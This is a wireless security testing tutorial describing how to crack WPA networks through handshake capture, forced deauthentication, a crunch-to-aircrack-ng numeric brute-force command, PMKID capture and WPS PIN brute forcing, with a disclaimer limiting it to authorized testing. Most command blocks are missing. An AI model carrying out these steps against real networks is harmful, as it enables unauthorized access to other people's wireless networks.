WPA Security Testing Guide
Educational Purpose Only
This guide is provided strictly for educational purposes and authorized security testing. You should only test networks that you own or have explicit written permission to test.
Unauthorized access to wireless networks is illegal and may result in serious legal consequences. Always ensure you have proper authorization before conducting any security testing.
Legal Responsibility
The author assumes no responsibility for any misuse of this information. Users are solely responsible for ensuring their activities comply with applicable laws and regulations.
Monitor Mode Setup¶
For RTL8188EUS wireless adapters:
- Disable the wireless interface
- Switch interface to monitor mode for packet capture
Network Discovery¶
Handshake Capture¶
Target Network Capture¶
- Replace
<filename>with your desired capture file name
Handshake Requirements
You need to capture the 4-way handshake between the access point and a client. This happens when:
- A client naturally connects to the network
- You force a reconnection using deauthentication
Force Handshake Capture¶
- This sends 1 deauthentication packet to force client reconnection
Parameter Explanation
-aAccess Point MAC address-cClient MAC address-0 1Send 1 deauthentication packet
Expected Result
After successful execution, you should see EAPOL/WPA handshake captured in your dump file.
Password Cracking¶
Numeric Brute Force (8 Digits)¶
For networks using simple 8-digit numeric passwords:
crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap #(1)!
- This generates all 8-digit combinations and pipes them to aircrack-ng
Performance Warning
Brute force attacks can take extremely long depending on:
- Password complexity
- Hardware performance
- Network traffic quality
Dictionary Attacks
Consider using common password dictionaries before brute force:
Wireshark Integration¶
For manual analysis and verification of captured handshakes:
PSK Generator Tool
Use Wireshark's online PSK generator for password verification:
PMKID Attack Method¶
Modern WPA2/WPA3 networks can be attacked using the PMKID (Pairwise Master Key Identifier) method, which doesn't require capturing a full 4-way handshake.
- Captures PMKID hashes to file named "PMKID"
PMKID Advantages
- No client required - works with access point alone
- Faster capture - no need to wait for client connections
- Less detectable - minimal network disruption
Work in Progress
Detailed PMKID cracking steps coming maybe someday...
WPS PIN Attack¶
WPS (Wi-Fi Protected Setup) vulnerabilities can be exploited when the access point has WPS PIN mode enabled (not Push Button Configuration).
WPS Requirements
- Access Point must have WPS PIN enabled
- Not PBC (Push Button Configuration) mode
- May take several hours to complete
- Replace with target AP's MAC address
How WPS PIN Attack Works
WPS PIN is only 8 digits, but the last digit is a checksum, making it effectively 7 digits. The attack exploits this by:
- Testing the first 4 digits
- Testing the remaining 3 digits
- Brute forcing ~11,000 combinations instead of 100 million
Resources & Tools¶
Essential Tools¶
-
hcxdumptool
Modern tool for capturing WiFi handshakes and PMKID attacks
-
hcxtools
Companion tools for converting and analyzing captured data
-
WPA-SEC
Online WPA/WPA2 cracking service with massive distributed computing
Additional References¶
Pro Tips
- Use GPU acceleration with hashcat for faster cracking
- Consider cloud-based cracking services for complex passwords